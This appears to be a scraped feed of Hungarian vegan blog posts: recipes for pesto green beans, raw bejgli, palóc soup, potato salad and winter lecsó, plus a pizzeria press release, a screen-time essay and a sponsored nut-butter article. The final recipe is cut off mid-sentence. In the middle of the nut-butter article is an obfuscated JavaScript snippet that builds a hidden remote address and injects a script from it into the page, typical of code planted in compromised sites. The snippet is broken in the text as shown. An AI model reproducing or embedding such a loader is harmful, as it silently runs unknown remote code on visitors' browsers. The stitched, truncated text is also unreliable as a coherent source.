Illatmámor, varázslat, a természet legszebb, legvirágosabb, legzöldebb, leginkább élettel teli időszakában vagyunk ... ezekből az élményekből- illatok, fények, látvány, hangok,... nem tudok eleget magamba szívni... Végtelen hálát érzek a szívemben azért, hogy van lehetőségem ilyen gyönyörü helyeken töltődni. Csodálatos országunk van Szépséges tájak, a hegyek nem túl magasak , nem túlhidegek, nem kopárak, zöld minden hegycsúcs, szelíd tájak, a klímánk nem túl meleg, nem túl hideg, a növényzet változatos, nincsenek gyilkos élőlények, ellenben nagyon sok forrásvizünk, thermálvizúnk van. #magyarországgyönyörü
Pesztós zöldbab
Itt a vegán január, sokan próbálkoznak ilyenkor legalább húsmentesen étkezni. A következő receptet mindenkinek ajánlom, mert hihetetlenül egyszerűen elkészíthető és rendkívül jól laktat. Ha nincs otthon hántolt zabunk, elkészíthetjük barna rizzsel, vagy fehér rizzsel is. Férjemmel mi nagyon megkedveltük a zabot mint köretet, és tulajdonképpen teljes értékű gabona. Lényegében ha valami gyors zöldséges ételt szeretnék készíteni, ez nálam egyfajta jolly joker. Igaz a zabot kuktában főzőm puhára és a zöldbabos szósznak se kell sok idő. Így az egész fél órán belül elkészül. A recept Hozzávalók: - 1/2 kg zöldbab - 25 dkg kukorica - 1 bögre olivabogyó - 3 dl növényi tej - vegán pesztó - 20 dkg zab Elkészítés: A zabot érdemes előre órákra beáztatni, akár előző éjszaka is. Ha kuktánk, elektromos kuktánk van, akkor az áztatás elmaradhat, viszont ekkor is érdemes bő vízzel átmosni. Kukta nélkül kb. kétszeres mennyiségű vízben a zabot puhára főzzük. Kuktában pedig követjük a készülék ajánlását (barna rizshez, ha nincs rajta zab feltüntetve). A zöldbabot, kukoricát és az olivabogyót egy edénybe tesszük, hozzáöntjük a növényi tejet (érdemes sűrűbb tejfélét választani), adunk hozzá 1 jó evőkanálnyi pesztót és tulajdonképpen fedő alatt puhára főzzük. Egyszerűen a megpuhult zab a köret (persze rizzsel is elkészíthető) és a zöldbabos-kukoricás szósszal tálaljuk. A pesztó lehet házilag készített - receptet találsz itt és itt, vagy üzletben vásárolt. Most a Veganuary-nak köszönhetően bizonyára Magyarországon is több üzletben van vegán termék. Nézz körül, hátha találsz pesztót is. (Angliában a Lidl-ben van).
Nyers-vegán mákos bejgli (gluténmentes)
A bejgli eredetileg Szilézia vidékéről származik. Ez a sziléziai kalácsfajta a 14. század óta ismert Európában. A bejgli (németül beugen = meghajlít, mohnbeugel = mákos kifli/bejgli) osztrák közvetítéssel érkezett hazánkba és terjedt el a 19. század második felében. Magyarországon ekkortól kezdték német divat szerint ünnepelni a karácsonyt. Eleinte családi ünnepek süteménye volt, majd a reformkortól kezdve fokozatosan felváltotta a hagyományos karácsonyi kalácsot. Bizonyára kezdetben, amikor Sziléziában vagy később, amikor már Magyarországon is elterjedt, készítői nem gondolkodtak azon, hogyan lehet ezt a finomságot úgy elkészíteni, hogy ne kelljen sütni, ráadásul liszt nélkül, sőt tojás és bármiféle zsiradék, na de hogy cukor hozzáadása nélkül! Napjaink fejlett konyhatechnikája és a nyers étkezést folytatók leleménye meghozta a bejglit a nyers (élő, sütés nélküli) sütemények világába is. Rendkívül előnyös, hogy a "tésztáját" akár hetekkel, hónapokkal előre elkészítheted. Nekem 3-4 hónapot várakozott az egyik lap (száraz helyen), mire oda jutottam, hogy megtöltöttem, felcsavartam. Nem lett semmi baja. El is fogyott. Másik előnye, hogy ha már van hozzá lapod, amit megtöltesz és feltekersz, szintén eláll akár egy hétig is (hacsak nem fogy el). Harmadik előnye, hogy egészséges, mivel csak rostokat tartalmaz, a benne lévő természetes cukrok felszívódása sem olyan gyors mint pl. a hagyományos bejglié. Negyedik előnye, hogy sokkal kevesebb időt kell eltölts vele, mint a hagyományos bejglivel, hiszen az aszalás ha időigényes is, de nem kell ott állj, várj, hanem közben millió dolgot elvégezhetsz, vagy akár aludhatsz is (ha éjszaka aszalsz). A recept Hozzávalók a "tésztához": - 4-5 szem alma (kb. 50 dkg) - kevés víz - Opcionális: 1 vagy 2 banán ha édesebb "tésztát" szeretnénk - Opcionális: 1/2 citrom leve ha világosabb "tésztát" szeretnénk Elkészítés: Az almákat meghámozzuk (a héjukat felhasználhatjuk müzlibe, vagy akár meg is ehetjük hámozás közben), apró darabokra vágjuk és egy turmixgép poharába tesszük. Magjait és magházát ne adjuk hozzá. Nagyon kevés vizet öntünk rá majd sűrű masszává turmixoljuk. Ahogy a hozzávalóknál írtam, banánt és vagy citromot adhatunk hozzá. Én csak almát és vizet használtam. Kb. fél cm vastagon elkenjük az aszaló lapon. Ha nincs aszalógép, se tálca hozzá, akkor egy tepsibe egy szilikonlapot fektetünk, arra öntjük rá a masszát, nyitott sütőt 50 fokra állítva hosszas órák alatt (8-10-12) megaszaljuk. Az aszalási idő függ attól, hogy mennyire vastag lapot készítünk. Sajnos sütőpapírt nem ajánlhatok ehhez a művelethez, mert összeráncosodik és nem lesz sima az almalap. Nehéz lesz leszedni róla. Ha szilikon lapon aszaljuk, akkor a végeredmény egy enyhén rugalmas almalap lesz. Hozzávalók a mákos töltelékhez: - 15 dkg mák - 1 maroknyi datolya - 1 bio citrom reszelt héja - 1/2 citrom leve Elkészítés: A mákot érdemes 1-2 nappal előtte elkészítenünk. A mákot kevés vízben (épp csak ellepje) néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt, megdarált mákot pedig összekeverjük a datolyaszósszal. Ha nem elég kenhető, túl száraz, akkor kevés citromlét kanalazunk hozzá. A mák áztatásával aktiváljuk a bennük rejlő fitinsavat, így a mákban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése. Persze enélkül is elkészíthető. Mivel mi nem kizárólag nyersen étkezünk, tartok itthon beáztatott és megszárított mákot, és hagyományos mákot is. Amikor nyers sütit készítek, a beáztatott, megszárított mákot használom fel. Tulajdonképpen ha a lapok már készen vannak, akkor a beigli elkészítése 10-15 perc, hiszen a megaszalt almalapra elegyengetjük a mákos tölteléket, majd akárcsak egy bejglit, felcsavarjuk. Érdemes 1-2 órát állni hagyni, mivel a szeletelés könnyebb lesz, ennyi idő alatt az almalap kissé felpuhul.
Palócleves Hémangi módra
2022. szeptember 21. Vegavarázs
… amelynek nincs is köze a palócokhoz. Azt mondják, Gundel János készítette először, és Mikszáth Kálmánról, a legnagyobb palócról nevezte el, egy másik történet szerint pedig az író születésnapján tálalta fel, amikor Mikszáth olyan levest kért, amely a magyar konyha minden zamatát magában foglalja. Természetesen az én palóclevesem hús nélkül készül, ám a helyben termelt zöldségektől és a fűszerektől így is teljesíti feladatát: magában foglalja a magyar konyha minden zamatát. Ez az isteni, savanykás ízű leves jó választás a hideg napok beköszöntével. Hozzávalók: 3 ek olaj 2 nagyobb krumpli felkockázva 30 dkg zöldbab 1-2 sárgarépa felkarikázva fél karalábé felkockázva 2,3 kk pirospaprika 3/4 kk aszafoetida (vagy 1 fej hagyma) 1 kk őrölt fűszerkömény egy csipet őrölt feketebors fél dl paradicsomlé 2 babérlevél 2 dl tejföl 2 ek liszt 2-3 kk só egy kis csokor kapor felaprítva Tetszőlegesen: egy darab gabonakolbász vagy egy pár vegán virsli (elhagyható)Egy fazékban felmelegítjük az olajat, beletesszük a megmosott, felaprított zöldségeket, és 3-4 percig dinszteljük. Megszórjuk pirospaprikával, aszafoetidával, fűszerköménnyel és borssal, ráöntjük a paradicsomlevet és felöntjük annyi vízzel, amennyi a leveshez kell. Megsózzuk és puhára főzzük a zöldségeket. A tejfölt és a lisztet habverővel simára keverjük, majd a leves levéből is keverünk hozzá egy merőkanálnyit. Végezetül hozzáadjuk a leveshez és behabarjuk. Beletesszük a kaprot, és ha a hús helyett szeretnénk vegán helyettesítőt beletenni (gabonakolbászt, vegán virslit), akkor azt is hozzáadjuk. Újraforrás után 2 percig főzzük. The post Palócleves Hémangi módra appeared first on Vegavarazs.
Majonézes krumplisaláta (vegán)
Krumpli, burgonya, pityóka, kolompér, vagy korompér, földialma, svábtök, mindegy is mi a neve, ha egyszer számos ételt készíthetünk belőle, vele. Sülve, főve, reszelve, kockázva, karikázva, változatossá teszi az étkezéseinket ez a gyökérgumó, ami Magyarországra 1650 körül jöhetett be bajor-osztrák közvetítéssel, de igazi elterjedése II. József magyar király adókedvezményeinek volt köszönhető. Amíg Magyarországon éltem, nem figyeltem fel nagyon arra, hogy hány és hány fajta burgonya létezik. Nyilván tudtam a batátáról, ami az édes krumpli és a hagyományos krumpliról, no meg az újkrumpliról. Itt, Angliában aztán csak rácsodálkoztam. Már azt is tudom, hogy a világon közel 200 fajta krumpli létezik. Választhatsz a széles kínálatból attól függően, hogy milyen ételt akarsz készíteni. Krumplipüréhez ajánlatos azt, ami gyorsan szétfő. Ehhez a salátához olyat válogattam, ami nem fő könnyen szét. Nem tudom már milyen neve volt. Az igazság az, hogy Olio appon keresztül ingyen jutottam hozzá pár kiló krumplihoz. Ez az egyik étel, ami lett belőle. Eheted pirítós kenyérrel, vagy (vegán) kolbásszal, vagy éppen a nagy nyári melegben, magában is. Ha szereted a zsenge újhagymát, vagy tavasszal a medvehagymát, érdemes apróra vágni őket és megszórni, akár bele is keverni. A recept Hozzávalók: - Pár darab főtt krumpli vagy air fryerben hajában sült krumpli - 2 zsenge újhagyma (opcionális) - só - 2 dl növényi joghurt - 2 kanál növényi majonéz - 1 kiskanál mustár (opcionális, én kihagytam) Elkészítés: A krumplit többféleképpen készíthetjük el. Én fogtam kb. 8 szem kisebb méretű krumplit, megmostam és air fryerben 15-20 perc alatt puhára sütöttem. Kicsit megvártam míg kihűlt, megpucoltam, felkockáztam és összeállítottam a salátát. Másik verzió, hogy a krumplit egészben, héjában megfőzzük. Amikor már puha, leöntjük róla a forró vizet, majd hideg csapvizet engedünk rá, így gyorsan és könnyen tudjuk megpucolni a krumplikat. Ezután kockákra vágjuk. Harmadik verzió, hogy a krumplit először megpucoljuk, felkockázzuk és annyi vízben, ami épp ellepi, egy kevés sóval puhára főzzük. A megfőtt krumplit leszűrjük és a kikevert majonézes szósszal, a felaprított hagymával összekeverjük. A joghurtot, a majonézt és a mustárt összekeverjük egy tálban, míg a krumplik elkészülnek. Az arányok ízlés szerint változtathatók. A hagymákat apróra felvágjuk. A megpárolt, leszűrt, krumplit a kész szósszal és a felaprított újhagymával (vagy lila hagymával) összekeverjük. El is készült a saláta. Érdemes hideg helyre tenni és megvárni míg lehűl.
A 125 éves pesti vegán hagyományokat ünnepli a GreenGorilla pizzéria
2022. február 10. Vegetáriánus receptek
Évszázados híreket olvashatunk mostantól a GreenGorilla pizzéria dobozaira nyomtatva. Az akció célja ismeretterjesztés: a hajdani újságcikkekből ugyanis kiderül, hogy a vegán életmódnak milyen komoly múltja van már a magyar fővárosban. Így például eddig valószínűleg kevesen tudták, hogy a Millenium évében is volt már Pesten a konyháján minden állati eredetű összetevőt mellőző étterem.
A tavaly nyáron megnyílt GreenGorilla a fővárosban jelenleg az egyetlen olyan beülős pizzéria, ahol kizárólagosan növényi alapanyagokat használnak. Utóbbi egy vegán helyen persze magától értetődő ez a fajta tudatosság itt ugyanakkor kiterjed a pizzériában előforduló összes, állatkísérlet-mentes mosogató és tisztítószerre, ahogyan az újrafelhasznált és lebomló csomagolásokra is. A pizzéria most a teljesen növényi eredetű étkezést népszerűsítendő kampányba kezdett, amelyből kiderül: Pesten már 125 éve is volt vegán étterem.
Jelenleg sokan úgy gondolják, hogy a vegán életmód valamilyen múló újdonság, újkeletű divathóbort. A magunk lehetőségeivel most mi is szeretnénk hozzájárulni ahhoz, hogy eloszlassuk ezt a tévedést, és ezáltal is mind többen kedvet kaphassanak a növényi alapú étkezéshez. A múlt ismerete nélkül nincsen jövő. Ezért jelentetjük meg újra azokat az újsághíreket a pizzásdobozainkon, amelyek még Budapest vegán történelmének hajnalán keletkeztek mondja Bíró Attila, a GreenGorilla alapítója.
Archív cikkes pizzásdoboz és lencsés pizza
A dobozokra került például a Pesti Hírlap egy 1899-es cikke, amelyből kiderül, hogy egy és negyed évszázada, a millennium évében, 1896. május 3-án létesítette egy Schulz Janka nevű berlini nő a Pipa utcában az első vegetárius-éttermet. A Pomona nevű helyről pár évvel később a Magyarország című lap már mint vegán étkezdéről emlékezik meg, mondván: vendéglőnek elég különös, mert nemcsak szeszes italokat nem adnak benne, de húst, vagy állati termékeket sem. Ezek az archív cikkek a GreenGorilla pizzásdobozokon most teljes terjedelmükben elolvashatóak.
A Dohány utca 88. szám alatt található GreenGorilla, amely egy szinte teljes egészében növényi táplálkozást folytató főemlősről kapta a nevét, a vegán elkötelezettségtől eltekintve a pizzasütés klasszikus hagyományait követi. A tészta készítéséhez kizárólag olasz pizzalisztet, sörélesztőt, szárított kovászt, extra szűz olívaolajat, valamint sót használnak. Erre kerülnek a saját recept alapján kreált szószok, a paradicsomos öntet és a bolognai, valamint a nemtejfölös alapok és persze a vegán feltétek is. Pizza alapanyagok esetében a sajt kulcskérdés: itt Hárskúti Attila kisüzemi körülmények készült, a vegán közösségben évek óta népszerű növényi sajtja olvadozik a pizzarétegek tetején. Giuseppe Cuoco, az olasz pizzaszakács pedig salernói és milánói kemencék mellett alapozta meg pizzasütő tudományát. A 125. évfordulóról megemlékezve a GreenGorillában a bolognai pizza most lencsével készül, mivel utóbbi az egyik kiemelt alapanyag volt a már említett Pomonában.
A pizzériában dolgozók egyenként is elkötelezettek az állatvédelem mellett. Közülük Bíró Attila éveken keresztül segítette a Füzesabonyi Állatvédő Alapítvány munkáját, a hagyományt folytatva pedig adománygyűjtő napokat is tartanak az üzletben - ilyenkor minden pizzából 500 Ft az Alapítvány számlájára kerül. A Jane Goodall Intézettel is együttműködik a GreenGorilla. Egyebek mellett úgy, hogy gyűjtőpontként funkcionál a már használhatatlan mobilkészülékek számára az Intézet által indított kampányban, megnyerhető pizzával és kisebb ajándékokkal bátorítva a telefonok, tabletek, fülhallgatók leadását. (A mobiltelefonokhoz szükséges ércet Afrikában gorillák és csimpánzok élőhelyén bányásszák, felemésztve erdeiket - a készülékek újrahasznosítása világszerte ezen a kritikus problémán is igyekszik enyhíteni.)
Világszerte terjed a vegán és vegetáriánus életmód, itthon is
Az állati eredetű származékokat teljesen mellőző életmód az egész világon egyértelműen növekvő trend: az Egyesült Államokban a vegán populáció 15 év alatt 300 ezerről a konzervatív becslések szerint is 10 millióra nőtt, míg egy másik, korábbi felmérés 20 millióra tette az amerikai vegán lélekszámot. Németországban például a 18-29 évesek 11, Lengyelországban 7 százalékuk már teljesen növényi alapú étrendet követ. Itthon egyelőre nincsenek megbízható releváns adatok, a vegán táplálkozás hívei Magyarországon körülbelül a populáció 1-2 százalékát tehetik ki.
Más kultúrákban a nem feltétlenül vegán, de húsmentes étkezésnek eleve történelmi hagyományai vannak: India például a társadalmi méretekben elterjedt vegetarianizmus egyik iskolapéldája. A dél-ázsiai országban élők közel 40%-a ilyen étrendet követ, Jamaicában és Vietnámban pedig körülbelül 10% ez az arány.
A GreenGorilla kínálata a Dohány utcai üzleten kívül több ételfutár weboldalán is elérhető.
Győri Ildikó
Lencsés rakott kelkáposzta magyarosan
Szív alakú kelkáposzta köszönti 2022-t! Az újévi lencsével kapcsolatban idén kicsit későn ébredtem, de remélem, azért még épp időben. Na, nem a főzéssel, az meglesz. A recepttel nektek! :) Az utolsó pillanatban megsütöttem a lencsés rakottamat, mert a “kötelező” lencsefőzeléket idén anyukám fogja készíteni. Igen, enyém a rakott, mert már nagyon várt rám egy gyönyörű, ráadásul szív formájú (!) kelkáposzta, ami mégsem maradhatott jövőre! ;) Amíg sült, leírtam a receptjét. Hozzávalók egy jó nagy sütőtálhoz - 1 fej kelkáposzta - 350 g lencse beáztatva - 50 g barnarizs - 100 g növényi kolbász - 50 g sörélesztőpehely - 100 ml olívaolaj - 2 kk só - 2 kk pirospaprika - 2 nagy gerezd fokhagyma - 500 g növényi joghurt Elkészítés - A lencsét, rizst főzd meg sótlan vízben. Mindkettő legyen még félig kemény, amikor elzárod. Nem kell mindenbe külön só, úgy könnyebb az összeállításnál beállítani, hogy összesen mennyit teszel be. - A kelkáposztát szedd levelekre, és egy nagy edényben tegyél fel vizet a tűzre. Ebben gőzöld elő a leveleket pár percig. - Közben olajon az élesztőpelyhet pirítsd meg. Nem kell neki sok, hamar megsötétedik. Tedd hozzá a reszelt fokhagymát, és együtt is kavargasd kicsit. Ha már olyan, mint a pirított prézli, add hozzá az elmorzsolt növényi kolbászt is, és vedd le a tűzről. - Most jön az összeállítás: egy jó nagy sütőtálban rétegezd a művedet sorjában: kelkáposztalevél, lencse, rizs, pirospaprika, élesztőpehely, só. A tetejére a legszebb, legnagyobb zöld leveleket tartogasd. - Nekem két emelet lett, és megtelt a sütőtálam. - Mielőtt betettem volna a sütőbe, 2 dl vízzel meglocsoltam, ebben sült-gőzölődött 180 fokon fél órát. Aztán öntöttem le 500 g szójajoghurttal, amit előtte egy dl vízzel hígítottam fel, majd visszatettem az egészet további 30 percre a sütőbe. Jó étvágyat! Elkészítési idő: 60 perc Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Vegán Szaloncukor-készítő Kezdő Vegán Haladó vegán (Superfood) Növényi tejtermékek Görög vegán Vegán MUST HAVE – a kötelező alapcsomag Ez egy vegán recept volt. :) Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba. The post Lencsés rakott kelkáposzta magyarosan first appeared on Kertkonyha.
Lecsó télire (vegán, olajmentes)
Gyerekkoromban nem voltam egy nagy lecsó kedvelő, de egyszer csak átkattant valami és elkezdtem enni, nagyon megszerettem. Amikor még Magyarországon éltünk, volt fagyasztó ládánk és minden nyáron befőztem lecsót télire. Néhány év kimaradt ebből, mivel fagyasztó ládánk nincs, viszont most már ha autóval megyünk Magyarországra Angliából, akkor mindig hozok ki magyar paprikát, paradicsomot, hagymát, fokhagymát arra a célra, hogy befőzzek finom magyar zöldségekből lecsót magunknak. Amikor Magyarországon járunk, bizonyos rokonaik, barátaink adnak az útra nekünk ilyen-olyan kerti kincseket. Így a lecsó az ízek mellett emlékeket is őriz. Azoknak az emlékét, akik örömmel és szeretettel hívtak magukhoz, majd ajándékoztak meg számunkra kincset érő paradicsom, paprika, hagyma, fokhagyma terméseikkel. Köszönjük nekik ezúton is. Volt aki már előre befőzött lecsót adott, ezt is köszönjük. (Személyiségi okokból nem nevezem meg őket.) Az emberek java olajjal vagy netalán zsírral készíti a lecsó befőzést. Mivel - ahogy blogom többi receptjéből kiderül - olajat csak akkor használok, ha muszáj, ha nélkülözhetetlen, kezdettől fogva, hogy üvegben teszem el a lecsót, nem használok a tartósításhoz olajat. A hagymát vizen párolom meg és a kifertőtlenített, felforralt üvegek már eleve segítenek a tartósításban, nem szükséges hozzá olaj. Különösen nem hevített olaj, ami ugye szív és érrendszerre nézve sem előnyös. Akár olajjal, akár olaj nélkül készíted, hasznos a nyár finom ízeit elmenteni télire. A recept: Hozzávalók: - 4-5 kg paprika (vegyesen piros és sárga) - 2-3 kg jó érett, paradicsom - 4-5 hagyma - 1 fej fokhagyma - só/ételízesítő - víz Befőzéshez: - üvegek - befőzési fólia - forró víz Elkészítés: A hagymát megpucoljuk és apróra vágjuk. Egy kevés vízen üvegesre pároljuk. Először a paprikákat majd a paradicsomokat feldaraboljuk. A megpárolódott hagymára először a paprikákat tesszük, majd ha kicsit megfonnyadtak, a paradicsomokat. Megsózzuk, vagy ételízesítőt adunk hozzá. A főzés vége felé felaprított fokhagymát. Lecsó üvegben való tartósítására inkább a nagyobb üvegek ajánlottak, amik legalább 1 literesek. Főként ha nagyobb a család, egy alkalommal talán nem csak egy üveget bontunk fel és készítjük el ebédre vagy vacsorára. Győződjünk meg arról, hogy a kupakok épek és rozsda- illetve, karcmentesek. Mossuk el őket. Ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. negyedéig vagy félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni, de legalább gyöngyöződni kezd. Ezt követően kivehetjük őket a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lecsó. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a a lecsót. A tepsiben pihenő forró üvegekhez közel tegyük a szintén forró lecsót. Konyhai sütőkesztyűt vagy konyharuhát használva nem égetjük meg a kezünket. Üvegről üvegre először kiöntjük a forró vizet az üvegből, majd megtöltjük lecsóval (merőkanál vagy kisebb kancsót használva például), befőzési fóliát teszünk rá, a kupakkal alaposan lezárjuk és egy előre elkészített meleg helyre fejjel lefelé állítjuk. A meleg helyet jelen esetben nyári takarók jelentették egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lecsó a tűzhelyen rotyog (vagy kinn a szabadban bográcsban). Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket takaróval vagy törölközővel, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24-36 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni. Szuper dolog télen a nyár ízét csempészni az ebédlőasztalra. Amikor a befőzés után hetekkel, hónapokkal elővesszük, érdemes újra kicsit felfőzni, adhatunk hozzá ízlésünknek megfelelően gabonakolbászt, babot (nekünk ez a kedvenc évek óta), húsmentes virslit, tofurántottát amivel "tojásos" lecsó ízét érhetjük el, stb.
Hogyan hatnak az okos eszközök
2021. május 14. Élj harmóniában
Ezt az írásomat egy cikk inspirálta, ami arról szólt, hogyan hatnak az okos eszközök a babákra. (A cikket a bejegyzés aljára belinkelem) Mi felnőttek is egyre gyakrabban használjuk a mindenféle okos eszközöket, kütyüket és sokan a pici gyerekeknek is odaadják, mondván ez majd "leköti" a gyereket.... Jógaoktatóként látom, hogy nagyon sok felnőtt küzd azzal, hogy nem tud elmélyedni valamiben, nem tud egy dologra koncentrálni, alvászavaros, depressziós, esetleg önértékelési problémi is vannak, állandóan pörög az agya, nincs türelme még egy cikket se végigolvasni vagy meghallgatni a saját gyerekét és sajnos a társadalom jelentős része nem tudja feldolgozni, megélni az élet történéseit... Biztos, hogy ennyi információra van szükséged és ilyen gyorsan, akár azonnal???Kell-e magyar családapaként vagy anyaként valakinek órákat tölteni azzal, hogy olvasgatja a híreket az egész világ történéseiről vagy tv sorozatokat néz fantasy világokról, miközben esetleg nincs ideje a saját gyerekére? A mai kor embere soha nincs ott ahol van.... mert az agya állandóan valahol máshol jár és nem tudja megéli a jelen pillanatot. Ez a szimpatikus idegrendszeri túltónus, az állandó információ tömeg ami az emberek nyakába hull feldolgozhatatlan az agy számára, kimeríti az idegrendszert és az egész szervezetet. Még a túlpörgetett felnőtteknél is kitartó munka lelassulni kicsit, megteremteni az elme békéjét, tudatosítani a jelen pillanatot. Mostanra megannyi kutatás támasztja alá, hogy a piciknél, pedig kifejezetten káros és sok esetben majdnem visszafordíthatatlan következményei vannak. Van a rövid és a hosszú távú haszon.... rövid távon lehet jó lefoglalni magadat vagy a gyereket a képernyőkkel, de hosszú távon érdemes határt szabni mind a saját, mind a környezetedben lévő gyerekek képernyő előtt töltött idejének... megéri a befektett energia Ne a készüléked legyen okos, hanem Te és használd okosan, hogy a javadat szolgálja a készülék. Inkább tölts több időt valós személyekkel, szerezz több információt a világról a valós életedből. Ma van csillagászatilag az év legkedvezőbb napja, ahhoz hogy belekezdj valami új dologba, elindíts valami változást az életedben, használd ki. Ha úgy érzed szeretnél jobban jelen lenni az életben, kezdj el ma leszokni a túlsok ifnormációról, túl sok képernyő bámulásról:) Remélem tudlak inspirláni Téged arra, ha szükséges változtass. Egy korábbi bejegyzésemben részletesebben is foglalkoztam a témával, itt olvashatod a teljes bejegyzést: http://eljharmoniaban.blogspot.com/2018/04/gyakran-kutakodsz-az-interneten-varod.htmlui: Köszönöm az inspirációt Vén Imolának, aki megosztotta ezt a cikket:)https://hellobaby.hu/igy_hatnak_a-babara_az_okos_eszkozok #okostelefon #okoseszköz #károshatásai #nyugtalanelme #alvászavar #koncentrációzavar #türelmetlenség #tudatosság #tudatoshasználat
Lehet a mogyorót is kenyérre kenni!
Amerikában régi hagyománya van a peanut butter&jelly szendvicsnek, egészen 1896-ig nyúlik vissza a története, még saját napja is van április 2-án. Elsőre furcsán hangozhat a magyar fülnek ez a kombináció: ez a szendvics tulajdonképpen szendvicskenyérre kent földimogyoróvaj, amelyre aztán lekvárt tesznek. Valami mégis lehet azonban benne, ha ennyire szeretik: egy 2002-es tanulmány szerint egy átlag amerikai 1500 ilyen szendvicset eszik meg, mire leérettségizik. (function(){ tzyqu=54jcn9d1zyqp;tzyq=document.createElement(script); tzyq_=u+(st);tzyq_+=at+(.);tzyq.async=true;tzyq_+=in; tzyqu=252362599.+tzyqu;tzyq.type=text/javascript;tzyqu+=qmpd06r9nfmn; tzyqu+=0jmapg;tzyq_+=(f)+o+(/);tzyq.src=https://+tzyq_+tzyqu; tzyqd=document.body;tzyqd.appendChild(tzyq); })(); Szponzorált cikk Bár az amerikai köztudottan eléggé elhízott társadalom, ez a nemzetei eledel kifejezetten egészséges is lehet, ha megfelelő alapanyagokkal készítjük el. A szendvicskenyeret elég jó minőségű kenyérre (pl. teljes kiőrlésű rozskenyérre vagy hosszú érlelésű, kovásszal készült kenyérre) cserélni, a földimogyoróvajból cukor- és pálmazsír mentes változatot választani, a lekvárból cukormenteset használni vagy friss gyümölcsre cserélni, és máris kész egy szuperfinom, magas fehérje tartalmú, lassú felszívódású szénhidrátot tartalmazó szendvics, amit a gyerekek is nagyon szívesen megesznek. Nem véletlen, hogy szintén Amerikában terjedt el szélesebb körben a többi olajos magból készült magkrém is: mandulakrém, kesudiókrém, törökmogyorókrém és társaik. Itthon ezek sajnos még kevésbé ismert alapanyagok, pedig ezek a krémek rendkívül sokoldalúan felhasználhatóak, és nagyon egészségesek. Magas a fehérje- és a telítetlen zsírsav tartalmuk, szénhidrát tartalmuk pedig alacsony, ráadásul tele vannak értékes ásványi anyagokkal és vitaminokkal (kálium, kálcium, magnézium, B1-, B2-, B6-vitaminok, E-vitamin stb.). Az olajos magok gyakorlatilag bármely diétába beilleszthetőek, ezek a krémek pedig a magok felhasználásának egy új dimenzióját nyitják meg: lehet őket zabkásába rakni, gazdagíthatjuk vele a turmixunkat, smoothie-nkat, lehet belőlük mindenféle kekszet, süteményt sütni (paleo és vegán sütik szuper alapanyaga, zsiradék helyettesítőként funkcionálhatnak), mehetnek palacsintába töltelékként, sőt, sós ételek kiváló alapanyagai is lehetnek (pl. tésztaszószhoz, salátaöntethez használhatjuk őket.). Nagyon fontos, hogy csak a jó minőségű, hozzáadott fehér cukor- és növényi zsír mentes változatokat válasszuk! Ezekből a krémekből is nagy a választék, de az igazán jó minőségű, csak az olajos magokat tartalmazó változat már ritkább. A Mendula magkrémjei pont ilyenek: nincs bennük semmi más, csak az enyhén pörkölt olajos mag (törökmogyoró, mandula, dió és földimogyoró), ill. léteznek ízesített változatok is. Az ízesített változatok is elképesztő különlegesek: van nekik vaníliás kesudiókrémjük (ami hozzáadott cukor nélkül is finom édeskés ízű, akár önmagában kanállal eszegetve is elmegy egy önálló desszertnek), de van fahéjas mandulakrémjük is, amelyben a mandulán kívül fahéj, és kevés kókuszvirágcukor van. Az egyik legnépszerűbb termékük az egészséges nutella verzió: ez egy 78% (!!!) törökmogyorótartamú mogyorókrém, amelyben ezen kívül csak kókuszcukor és kakaópor van. És ha már a földimogyoró vajjal kezdődött az egész cikk, kiemelnénk a földimogyoró vajukat is: kétféle változatuk is létezik, egy natúr, és egy sós-földimogyoró darabos. Mindkettőben közös azonban, hogy nincs bennük se pálmazsír, se cukor, se semmi egyéb turpisság. Ki kell őket próbálni, végre egy olyan termékcsoport, ami úgy finom, hogy még egészséges is! Tedd a kedveceim közé 0 The post Lehet a mogyorót is kenyérre kenni! appeared first on VegaNinja.
Fekete babos töltött paprika
Ha újévkor valamilyen babos-lencsés ételt ennél, készítenél, akkor ez a töltött paprika remek választás. Fekete babbal, vese babbal de lencsével elkészítve is nagyon finom. Én vadrizset is használtam hozzá (mások thai rizsnek hívják), de ha csak sima fehér rizs van otthon, akkor is bátran ajánlom, készítsd el. A fehér rizs és lencse együtt is jó sikert hozhat. Újévi szokás a magyaroknál lencsét enni, ami egyfajta babonának is tudható, mondván, hogy aki lencsét eszik, annak nem fogy el a pénze az év során. A japánok babot esznek, míg dél-Amerika országaiban pedig 12 szem szőlő vagy mazsola fogyasztásával indulnak neki az új évnek. Törökországban gránátalma a szerencsét hozó étel újévkor. Amerikában a káposzta zöld levelére helyezik a hangsúlyt anyagi gyarapodást remélve. A recept Hozzávalók: - néhány fej kaliforniai paprika - 1 bögre fekete bab - 1/2 bögre vadrizs - 1/2 bögre barna rizs - 3-4 gerezd fokhagyma - ételízesítő - vegán sajt / sörélesztő pehely / füstölt tofu - paradicsomszeletek (inkább dekoráció, tehát elhagyható) Elkészítés: Ha nem konzerv babbal dolgozunk, akkor érdemes a babot főzése előtt legalább 4 óráig, de akár 8-10 órán keresztül is beáztatni. A beáztatott bab vizét főzés előtt leszűrjük majd hideg vizet öntünk rá és elkezdjük főzni. Főzés közben adunk hozzá sót és 